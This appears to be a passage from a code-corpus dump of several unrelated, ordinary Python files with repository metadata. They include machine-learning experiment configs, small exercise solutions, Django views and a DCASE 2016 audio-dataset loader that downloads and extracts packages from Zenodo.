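max_edge = rebar_size // 4
possibilities = [
    [x, y, z]
    for x, y, z in product(range(1, max_edge), repeat=3)
    if x + y + z == max_edge and x * y * z <= max_volume
]
print(possibilities)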
fc023f325bac01c708172ac7efe7e26fded07e1b | 172 | py | Python | cosmosis/datablock/__init__.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis/datablock/__init__.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis/datablock/__init__.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | from __future__ import absolute_import
from .cosmosis_py.block import DataBlock, BlockError, option_section, SectionOptions
from .cosmosis_py import section_names as names
| 43 | 84 | 0.866279 | 23 | 172 | 6.086957 | 0.608696 | 0.171429 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098837 | 172 | 3 | 85 | 57.333333 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc46fb3ed4dc406673332d1f4b441333a8a98172 | 2,533 | py | Python | experiment_scripts/paper_runs/big_batch/make_resnet_long.py | jacqueschen1/adam_sgd_heavy_tails | d4ecab6d460fb44ac3fd2b865641b8e47f3848ee | [
"Apache-2.0"
] | 1 | 2021-12-02T21:47:46.000Z | 2021-12-02T21:47:46.000Z | experiment_scripts/paper_runs/big_batch/make_resnet_long.py | jacqueschen1/adam_sgd_heavy_tails | d4ecab6d460fb44ac3fd2b865641b8e47f3848ee | [
"Apache-2.0"
] | null | null | null | experiment_scripts/paper_runs/big_batch/make_resnet_long.py | jacqueschen1/adam_sgd_heavy_tails | d4ecab6d460fb44ac3fd2b865641b8e47f3848ee | [
"Apache-2.0"
] | null | null | null | # 5 hours big gpu
import numpy as np
import explib
def merge_grids(*grids):
return sorted(list(set.union(*[set(grid) for grid in grids])))
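# Hedged example (not in the original script): merge_grids de-duplicates shared grid
# points and returns a sorted list, e.g.
#   merge_grids(np.logspace(-2, 0, num=3, base=10), np.logspace(-1, 0, num=2, base=10))
#   # -> [0.01, 0.1, 1.0]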
EXPERIMENTS = []
EXPERIMENTS_SGD = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar100",
"model": "resnet50",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "SGD",
"alpha": alpha,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in np.logspace(-8, 1, num=10, base=10)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS_ADAM = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar100",
"model": "resnet50",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "Adam",
"alpha": alpha,
"b1": 0.9,
"b2": 0.999,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in np.logspace(-8, 1, num=10, base=10)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS.extend(EXPERIMENTS_SGD)
EXPERIMENTS.extend(EXPERIMENTS_ADAM)
EXPERIMENTS_SGD = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar10",
"model": "resnet34",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "SGD",
"alpha": alpha,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in merge_grids(
np.logspace(-4, 0, num=5, base=10), np.logspace(-2, 0, num=6, base=10)
)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS_ADAM = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar10",
"model": "resnet34",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "Adam",
"alpha": alpha,
"b1": 0.9,
"b2": 0.999,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in np.logspace(-6, 1, num=8, base=10)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS.extend(EXPERIMENTS_SGD)
EXPERIMENTS.extend(EXPERIMENTS_ADAM)
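# Hedged bookkeeping note (not in the original script): with the grids above, EXPERIMENTS
# holds 10*5 SGD and 10*5 Adam cifar100 configs plus 9*5 SGD (the two merged grids share
# the points 1e-2 and 1e0) and 8*5 Adam cifar10 configs, i.e. 185 entries in total.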
if __name__ == "__main__":
explib.expmaker.experiment_maker_cli(
descr="all experiments", experiments=EXPERIMENTS
)
| 22.415929 | 78 | 0.506119 | 285 | 2,533 | 4.329825 | 0.259649 | 0.032415 | 0.048622 | 0.071313 | 0.797407 | 0.797407 | 0.797407 | 0.797407 | 0.774716 | 0.774716 | 0 | 0.058333 | 0.336755 | 2,533 | 112 | 79 | 22.616071 | 0.67619 | 0.005922 | 0 | 0.707071 | 0 | 0 | 0.199921 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010101 | false | 0 | 0.020202 | 0.010101 | 0.040404 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc4d5499ac2a623993710f43ece8ab531d8bc521 | 35 | py | Python | Problems/fyi.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/fyi.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/fyi.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null |
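# Print 1 if the input phone number starts with "555", otherwise print 0.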
print(int(input()[0:3] == '555'))
| 11.666667 | 33 | 0.514286 | 6 | 35 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 0.114286 | 35 | 2 | 34 | 17.5 | 0.419355 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
fc6033501eb354de17cc3c750aa055aaa5d38b09 | 181 | py | Python | Darlington/phase2/STRINGS/day 32 solution/qtn9.py | CodedLadiesInnovateTech/-python-challenge-solutions | 430cd3eb84a2905a286819eef384ee484d8eb9e7 | [
"MIT"
] | 6 | 2020-05-23T19:53:25.000Z | 2021-05-08T20:21:30.000Z | Darlington/phase2/STRINGS/day 32 solution/qtn9.py | CodedLadiesInnovateTech/-python-challenge-solutions | 430cd3eb84a2905a286819eef384ee484d8eb9e7 | [
"MIT"
] | 8 | 2020-05-14T18:53:12.000Z | 2020-07-03T00:06:20.000Z | Darlington/phase2/STRINGS/day 32 solution/qtn9.py | CodedLadiesInnovateTech/-python-challenge-solutions | 430cd3eb84a2905a286819eef384ee484d8eb9e7 | [
"MIT"
] | 39 | 2020-05-10T20:55:02.000Z | 2020-09-12T17:40:59.000Z | # Program to reverse a string.
def reverse_string(str1):
return ''.join(reversed(str1))
print()
print(reverse_string("abcdef"))
print(reverse_string("Python Exercises."))
print() | 25.857143 | 42 | 0.745856 | 24 | 181 | 5.5 | 0.583333 | 0.295455 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.093923 | 181 | 7 | 43 | 25.857143 | 0.792683 | 0.154696 | 0 | 0.333333 | 0 | 0 | 0.150327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0.166667 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
fc694957398f13cda1ea4e009b21ca818b97b2cd | 87 | py | Python | example_project/core/context_processors.py | pnuckowski/django-guardian | 8e8dab207296ee37aa1d19eaeebfad7d0642f138 | [
"MIT"
] | 2,469 | 2015-07-27T14:21:38.000Z | 2022-03-29T23:37:37.000Z | example_project/core/context_processors.py | meetbill/django-guardian | d3611494c1e40a67b20e32ffe9e5198a53923aa2 | [
"MIT"
] | 458 | 2015-07-27T12:02:14.000Z | 2022-03-25T21:42:59.000Z | example_project/core/context_processors.py | meetbill/django-guardian | d3611494c1e40a67b20e32ffe9e5198a53923aa2 | [
"MIT"
] | 429 | 2015-07-31T08:04:17.000Z | 2022-03-11T09:28:55.000Z | import guardian
def version(request):
return {'version': guardian.get_version()}
| 14.5 | 46 | 0.724138 | 10 | 87 | 6.2 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149425 | 87 | 5 | 47 | 17.4 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0.08046 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
fc85cf1e7c5fd7342d783b5ef7529be48deb2500 | 889 | py | Python | build/mavros/catkin_generated/pkg.installspace.context.pc.py | arijitnoobstar/UAVProjectileCatcher | 3c1bed80df167192cb4b971b58c891187628142e | [
"Apache-2.0"
] | 10 | 2021-03-15T03:58:06.000Z | 2021-12-30T15:33:38.000Z | build/mavros/catkin_generated/pkg.installspace.context.pc.py | arijitnoobstar/UAVProjectileCatcher | 3c1bed80df167192cb4b971b58c891187628142e | [
"Apache-2.0"
] | 1 | 2021-09-09T15:29:31.000Z | 2021-09-09T15:29:31.000Z | build/mavros/catkin_generated/pkg.installspace.context.pc.py | arijitnoobstar/UAVProjectileCatcher | 3c1bed80df167192cb4b971b58c891187628142e | [
"Apache-2.0"
] | 4 | 2021-03-06T09:35:58.000Z | 2021-05-24T14:34:11.000Z | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/usr/include;/usr/include/eigen3".split(';') if "${prefix}/include;/usr/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "diagnostic_msgs;diagnostic_updater;eigen_conversions;geographic_msgs;geometry_msgs;libmavconn;mavros_msgs;message_runtime;nav_msgs;pluginlib;roscpp;sensor_msgs;std_msgs;tf2_ros;trajectory_msgs;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lmavros;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libGeographic.so".split(';') if "-lmavros;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libGeographic.so" != "" else []
PROJECT_NAME = "mavros"
PROJECT_SPACE_DIR = "/home/arijitnoobstar/UAVProjectileCatcher/install"
PROJECT_VERSION = "1.5.1"
| 98.777778 | 260 | 0.7964 | 126 | 889 | 5.34127 | 0.5 | 0.059435 | 0.10104 | 0.065379 | 0.341753 | 0.341753 | 0.341753 | 0.225854 | 0.225854 | 0.225854 | 0 | 0.025882 | 0.04387 | 889 | 8 | 261 | 111.125 | 0.765882 | 0.060742 | 0 | 0 | 1 | 0.428571 | 0.677071 | 0.659064 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc8e644e558c4bd2c034ae8070b2035cf44c3083 | 138 | py | Python | trend/views.py | power3247/project3 | 0702d4754b3cb2b570b1d01df77d412c51eb28a6 | [
"Apache-2.0"
] | null | null | null | trend/views.py | power3247/project3 | 0702d4754b3cb2b570b1d01df77d412c51eb28a6 | [
"Apache-2.0"
] | null | null | null | trend/views.py | power3247/project3 | 0702d4754b3cb2b570b1d01df77d412c51eb28a6 | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render
# Create your views here.
def trendview(request):
return render(request, 'trend/trend.html')
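# Hedged usage sketch: a matching URL pattern (hypothetical) such as
#   path('trend/', trendview)
# in urls.py would render the 'trend/trend.html' template via this view.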
| 13.8 | 46 | 0.73913 | 18 | 138 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 138 | 9 | 47 | 15.333333 | 0.886957 | 0.166667 | 0 | 0 | 0 | 0 | 0.144144 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
5d7652870c78561dc44db65a46067e300da437c2 | 78,389 | py | Python | runs/2016/dnn2016verylarge/src/dataset.py | rohit21122012/DCASE2013 | 5360402265331d1c9032cf0fa94ef73f8c3c1047 | [
"MIT"
] | 2 | 2016-10-19T06:26:50.000Z | 2016-10-19T13:39:42.000Z | runs/2016/dnn2016verylarge/src/dataset.py | rohit21122012/DCASE2013 | 5360402265331d1c9032cf0fa94ef73f8c3c1047 | [
"MIT"
] | null | null | null | runs/2016/dnn2016verylarge/src/dataset.py | rohit21122012/DCASE2013 | 5360402265331d1c9032cf0fa94ef73f8c3c1047 | [
"MIT"
] | 2 | 2016-06-29T02:32:05.000Z | 2017-08-05T08:15:11.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import urllib2
import socket
import locale
import zipfile
import tarfile
from sklearn.cross_validation import StratifiedShuffleSplit, KFold
from ui import *
from general import *
from files import *
class Dataset(object):
"""Dataset base class.
The specific dataset classes are inherited from this class, and only needed methods are reimplemented.
"""
def __init__(self, data_path='data', name='dataset'):
"""__init__ method.
Parameters
----------
data_path : str
Basepath where the dataset is stored.
(Default value='data')
"""
# Folder name for dataset
self.name = name
# Path to the dataset
self.local_path = os.path.join(data_path, self.name)
# Create the dataset path if does not exist
if not os.path.isdir(self.local_path):
os.makedirs(self.local_path)
# Evaluation setup folder
self.evaluation_setup_folder = 'evaluation_setup'
# Path to the folder containing evaluation setup files
self.evaluation_setup_path = os.path.join(self.local_path, self.evaluation_setup_folder)
# Meta data file, csv-format
self.meta_filename = 'meta.txt'
# Path to meta data file
self.meta_file = os.path.join(self.local_path, self.meta_filename)
# Hash file to detect removed or added files
self.filelisthash_filename = 'filelist.hash'
# Number of evaluation folds
self.evaluation_folds = 1
# List containing dataset package items
# Define this in the inherited class.
# Format:
# {
# 'remote_package': download_url,
# 'local_package': os.path.join(self.local_path, 'name_of_downloaded_package'),
# 'local_audio_path': os.path.join(self.local_path, 'name_of_folder_containing_audio_files'),
# }
self.package_list = []
# List of audio files
self.files = None
# List of meta data dict
self.meta_data = None
# Training meta data for folds
self.evaluation_data_train = {}
# Testing meta data for folds
self.evaluation_data_test = {}
# Recognized audio extensions
self.audio_extensions = {'wav', 'flac'}
# Info fields for dataset
self.authors = ''
self.name_remote = ''
self.url = ''
self.audio_source = ''
self.audio_type = ''
self.recording_device_model = ''
self.microphone_model = ''
@property
def audio_files(self):
"""Get all audio files in the dataset
Parameters
----------
Nothing
Returns
-------
filelist : list
File list with absolute paths
"""
if self.files is None:
self.files = []
for item in self.package_list:
path = item['local_audio_path']
if path:
l = os.listdir(path)
for f in l:
file_name, file_extension = os.path.splitext(f)
if file_extension[1:] in self.audio_extensions:
self.files.append(os.path.abspath(os.path.join(path, f)))
self.files.sort()
return self.files
@property
def audio_file_count(self):
"""Get number of audio files in dataset
Parameters
----------
Nothing
Returns
-------
filecount : int
Number of audio files
"""
return len(self.audio_files)
@property
def meta(self):
"""Get meta data for dataset. If not already read from disk, data is read and returned.
Parameters
----------
Nothing
Returns
-------
meta_data : list
List containing meta data as dict.
Raises
-------
IOError
meta file not found.
"""
if self.meta_data is None:
self.meta_data = []
meta_id = 0
if os.path.isfile(self.meta_file):
f = open(self.meta_file, 'rt')
try:
reader = csv.reader(f, delimiter='\t')
for row in reader:
if len(row) == 2:
# Scene meta
self.meta_data.append({'file': row[0], 'scene_label': row[1].rstrip()})
elif len(row) == 4:
# Audio tagging meta
self.meta_data.append(
{'file': row[0], 'scene_label': row[1].rstrip(), 'tag_string': row[2].rstrip(),
'tags': row[3].split(';')})
elif len(row) == 6:
# Event meta
self.meta_data.append({'file': row[0],
'scene_label': row[1].rstrip(),
'event_onset': float(row[2]),
'event_offset': float(row[3]),
'event_label': row[4].rstrip(),
'event_type': row[5].rstrip(),
'id': meta_id
})
meta_id += 1
finally:
f.close()
else:
raise IOError("Meta file not found [%s]" % self.meta_file)
return self.meta_data
@property
def meta_count(self):
"""Number of meta data items.
Parameters
----------
Nothing
Returns
-------
meta_item_count : int
Meta data item count
"""
return len(self.meta)
@property
def fold_count(self):
"""Number of fold in the evaluation setup.
Parameters
----------
Nothing
Returns
-------
fold_count : int
Number of folds
"""
return self.evaluation_folds
@property
def scene_labels(self):
"""List of unique scene labels in the meta data.
Parameters
----------
Nothing
Returns
-------
labels : list
List of scene labels in alphabetical order.
"""
labels = []
for item in self.meta:
if 'scene_label' in item and item['scene_label'] not in labels:
labels.append(item['scene_label'])
labels.sort()
return labels
@property
def scene_label_count(self):
"""Number of unique scene labels in the meta data.
Parameters
----------
Nothing
Returns
-------
scene_label_count : int
Number of unique scene labels.
"""
return len(self.scene_labels)
@property
def event_labels(self):
"""List of unique event labels in the meta data.
Parameters
----------
Nothing
Returns
-------
labels : list
List of event labels in alphabetical order.
"""
labels = []
for item in self.meta:
if 'event_label' in item and item['event_label'].rstrip() not in labels:
labels.append(item['event_label'].rstrip())
labels.sort()
return labels
@property
def event_label_count(self):
"""Number of unique event labels in the meta data.
Parameters
----------
Nothing
Returns
-------
event_label_count : int
Number of unique event labels
"""
return len(self.event_labels)
@property
def audio_tags(self):
"""List of unique audio tags in the meta data.
Parameters
----------
Nothing
Returns
-------
labels : list
List of audio tags in alphabetical order.
"""
tags = []
for item in self.meta:
if 'tags' in item:
for tag in item['tags']:
if tag and tag not in tags:
tags.append(tag)
tags.sort()
return tags
@property
def audio_tag_count(self):
"""Number of unique audio tags in the meta data.
Parameters
----------
Nothing
Returns
-------
audio_tag_count : int
Number of unique audio tags
"""
return len(self.audio_tags)
def __getitem__(self, i):
"""Getting meta data item
Parameters
----------
i : int
item id
Returns
-------
meta_data : dict
Meta data item
"""
if i < len(self.meta):
return self.meta[i]
else:
return None
def __iter__(self):
"""Iterator for meta data items
Parameters
----------
Nothing
Returns
-------
Nothing
"""
i = 0
meta = self[i]
        # yield meta data items while they are available
while meta is not None:
yield meta
# get next item
i += 1
meta = self[i]
@staticmethod
def print_bytes(num_bytes):
"""Output number of bytes according to locale and with IEC binary prefixes
Parameters
----------
num_bytes : int > 0 [scalar]
Bytes
Returns
-------
bytes : str
Human readable string
"""
KiB = 1024
MiB = KiB * KiB
GiB = KiB * MiB
TiB = KiB * GiB
PiB = KiB * TiB
EiB = KiB * PiB
ZiB = KiB * EiB
YiB = KiB * ZiB
locale.setlocale(locale.LC_ALL, '')
output = locale.format("%d", num_bytes, grouping=True) + ' bytes'
if num_bytes > YiB:
output += ' (%.4g YiB)' % (num_bytes / YiB)
elif num_bytes > ZiB:
output += ' (%.4g ZiB)' % (num_bytes / ZiB)
elif num_bytes > EiB:
output += ' (%.4g EiB)' % (num_bytes / EiB)
elif num_bytes > PiB:
output += ' (%.4g PiB)' % (num_bytes / PiB)
elif num_bytes > TiB:
output += ' (%.4g TiB)' % (num_bytes / TiB)
elif num_bytes > GiB:
output += ' (%.4g GiB)' % (num_bytes / GiB)
elif num_bytes > MiB:
output += ' (%.4g MiB)' % (num_bytes / MiB)
elif num_bytes > KiB:
output += ' (%.4g KiB)' % (num_bytes / KiB)
return output
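        # Hedged example (not in the original file): Dataset.print_bytes(5 * 1024 * 1024)
        # returns a locale-formatted string such as '5,242,880 bytes (5 MiB)'.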
def download(self):
"""Download dataset over the internet to the local path
Parameters
----------
Nothing
Returns
-------
Nothing
Raises
-------
IOError
Download failed.
"""
section_header('Download dataset')
for item in self.package_list:
try:
if item['remote_package'] and not os.path.isfile(item['local_package']):
data = None
req = urllib2.Request(item['remote_package'], data, {})
handle = urllib2.urlopen(req)
if "Content-Length" in handle.headers.items():
size = int(handle.info()["Content-Length"])
else:
size = None
actualSize = 0
blocksize = 64 * 1024
tmp_file = os.path.join(self.local_path, 'tmp_file')
fo = open(tmp_file, "wb")
terminate = False
while not terminate:
block = handle.read(blocksize)
actualSize += len(block)
if size:
progress(title_text=os.path.split(item['local_package'])[1],
percentage=actualSize / float(size),
note=self.print_bytes(actualSize))
else:
progress(title_text=os.path.split(item['local_package'])[1],
note=self.print_bytes(actualSize))
if len(block) == 0:
break
fo.write(block)
fo.close()
os.rename(tmp_file, item['local_package'])
            except (urllib2.URLError, socket.timeout), e:
                try:
                    fo.close()
                except:
                    pass
                raise IOError('Download failed [%s]' % (item['remote_package']))
foot()
def extract(self):
"""Extract the dataset packages
Parameters
----------
Nothing
Returns
-------
Nothing
"""
section_header('Extract dataset')
for item_id, item in enumerate(self.package_list):
if item['local_package']:
if item['local_package'].endswith('.zip'):
with zipfile.ZipFile(item['local_package'], "r") as z:
# Trick to omit first level folder
parts = []
for name in z.namelist():
if not name.endswith('/'):
parts.append(name.split('/')[:-1])
prefix = os.path.commonprefix(parts) or ''
if prefix:
if len(prefix) > 1:
prefix_ = list()
prefix_.append(prefix[0])
prefix = prefix_
prefix = '/'.join(prefix) + '/'
offset = len(prefix)
# Start extraction
members = z.infolist()
file_count = 1
for i, member in enumerate(members):
if len(member.filename) > offset:
member.filename = member.filename[offset:]
if not os.path.isfile(os.path.join(self.local_path, member.filename)):
z.extract(member, self.local_path)
progress(title_text='Extracting ['+str(item_id)+'/'+str(len(self.package_list))+']', percentage=(file_count / float(len(members))),
note=member.filename)
file_count += 1
elif item['local_package'].endswith('.tar.gz'):
tar = tarfile.open(item['local_package'], "r:gz")
for i, tar_info in enumerate(tar):
if not os.path.isfile(os.path.join(self.local_path, tar_info.name)):
tar.extract(tar_info, self.local_path)
progress(title_text='Extracting ['+str(item_id)+'/'+str(len(self.package_list))+']', note=tar_info.name)
tar.members = []
tar.close()
foot()
def on_after_extract(self):
"""Dataset meta data preparation, this will be overloaded in dataset specific classes
Parameters
----------
Nothing
Returns
-------
Nothing
"""
pass
def get_filelist(self):
"""List of files under local_path
Parameters
----------
Nothing
Returns
-------
filelist: list
File list
"""
filelist = []
for path, subdirs, files in os.walk(self.local_path):
for name in files:
filelist.append(os.path.join(path, name))
return filelist
def check_filelist(self):
"""Generates hash from file list and check does it matches with one saved in filelist.hash.
If some files have been deleted or added, checking will result False.
Parameters
----------
Nothing
Returns
-------
result: bool
Result
"""
if os.path.isfile(os.path.join(self.local_path, self.filelisthash_filename)):
hash = load_text(os.path.join(self.local_path, self.filelisthash_filename))[0]
if hash != get_parameter_hash(sorted(self.get_filelist())):
return False
else:
return True
else:
return False
def save_filelist_hash(self):
"""Generates file list hash, and saves it as filelist.hash under local_path.
Parameters
----------
Nothing
Returns
-------
Nothing
"""
filelist = self.get_filelist()
filelist_hash_not_found = True
for file in filelist:
if self.filelisthash_filename in file:
filelist_hash_not_found = False
if filelist_hash_not_found:
filelist.append(os.path.join(self.local_path, self.filelisthash_filename))
save_text(os.path.join(self.local_path, self.filelisthash_filename), get_parameter_hash(sorted(filelist)))
def fetch(self):
"""Download, extract and prepare the dataset.
Parameters
----------
Nothing
Returns
-------
Nothing
"""
if not self.check_filelist():
self.download()
self.extract()
self.on_after_extract()
self.save_filelist_hash()
return self
def train(self, fold=0):
"""List of training items.
Parameters
----------
fold : int > 0 [scalar]
            Fold id; if zero, all meta data is returned.
(Default value=0)
Returns
-------
list : list of dicts
List containing all meta data assigned to training set for given fold.
"""
if fold not in self.evaluation_data_train:
self.evaluation_data_train[fold] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
if len(row) == 2:
# Scene meta
self.evaluation_data_train[fold].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1]
})
elif len(row) == 4:
# Audio tagging meta
self.evaluation_data_train[fold].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1],
'tag_string': row[2],
'tags': row[3].split(';')
})
elif len(row) == 5:
# Event meta
self.evaluation_data_train[fold].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1],
'event_onset': float(row[2]),
'event_offset': float(row[3]),
'event_label': row[4]
})
else:
data = []
for item in self.meta:
if 'event_label' in item:
data.append({'file': self.relative_to_absolute_path(item['file']),
'scene_label': item['scene_label'],
'event_onset': item['event_onset'],
'event_offset': item['event_offset'],
'event_label': item['event_label'],
})
else:
data.append({'file': self.relative_to_absolute_path(item['file']),
'scene_label': item['scene_label']
})
self.evaluation_data_train[0] = data
return self.evaluation_data_train[fold]
def test(self, fold=0):
"""List of testing items.
Parameters
----------
fold : int > 0 [scalar]
            Fold id; if zero, all meta data is returned.
(Default value=0)
Returns
-------
list : list of dicts
List containing all meta data assigned to testing set for given fold.
"""
if fold not in self.evaluation_data_test:
self.evaluation_data_test[fold] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
self.evaluation_data_test[fold].append({'file': self.relative_to_absolute_path(row[0])})
else:
data = []
files = []
for item in self.meta:
if self.relative_to_absolute_path(item['file']) not in files:
data.append({'file': self.relative_to_absolute_path(item['file'])})
files.append(self.relative_to_absolute_path(item['file']))
self.evaluation_data_test[fold] = data
return self.evaluation_data_test[fold]
def folds(self, mode='folds'):
"""List of fold ids
Parameters
----------
mode : str {'folds','full'}
            Fold setup type; possible values are 'folds' and 'full'. In 'full' mode the fold number is set to 0 and all data is used for training.
(Default value=folds)
Returns
-------
list : list of integers
Fold ids
"""
if mode == 'folds':
return range(1, self.evaluation_folds + 1)
elif mode == 'full':
return [0]
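        # Example (sketch): with evaluation_folds == 4, folds('folds') returns [1, 2, 3, 4]
        # and folds('full') returns [0].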
def file_meta(self, file):
"""Meta data for given file
Parameters
----------
file : str
File name
Returns
-------
list : list of dicts
List containing all meta data related to given file.
"""
file = self.absolute_to_relative(file)
file_meta = []
for item in self.meta:
if item['file'] == file:
file_meta.append(item)
return file_meta
def relative_to_absolute_path(self, path):
"""Converts relative path into absolute path.
Parameters
----------
path : str
Relative path
Returns
-------
path : str
Absolute path
"""
return os.path.abspath(os.path.join(self.local_path, path))
def absolute_to_relative(self, path):
"""Converts absolute path into relative path.
Parameters
----------
path : str
Absolute path
Returns
-------
path : str
Relative path
"""
if path.startswith(os.path.abspath(self.local_path)):
return os.path.relpath(path, self.local_path)
else:
return path
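# Hedged usage sketch (illustrative, not part of the classes below): a concrete dataset
# is typically fetched and then iterated per fold, e.g.
#   dataset = TUTAcousticScenes_2016_DevelopmentSet(data_path='data').fetch()
#   for fold in dataset.folds(mode='folds'):
#       train_items = dataset.train(fold)
#       test_items = dataset.test(fold)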
# =====================================================
# DCASE 2016
# =====================================================
class TUTAcousticScenes_2016_DevelopmentSet(Dataset):
"""TUT Acoustic scenes 2016 development dataset
This dataset is used in DCASE2016 - Task 1, Acoustic scene classification
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-acoustic-scenes-2016-development')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Acoustic Scenes 2016, development dataset'
self.url = 'https://zenodo.org/record/45739'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
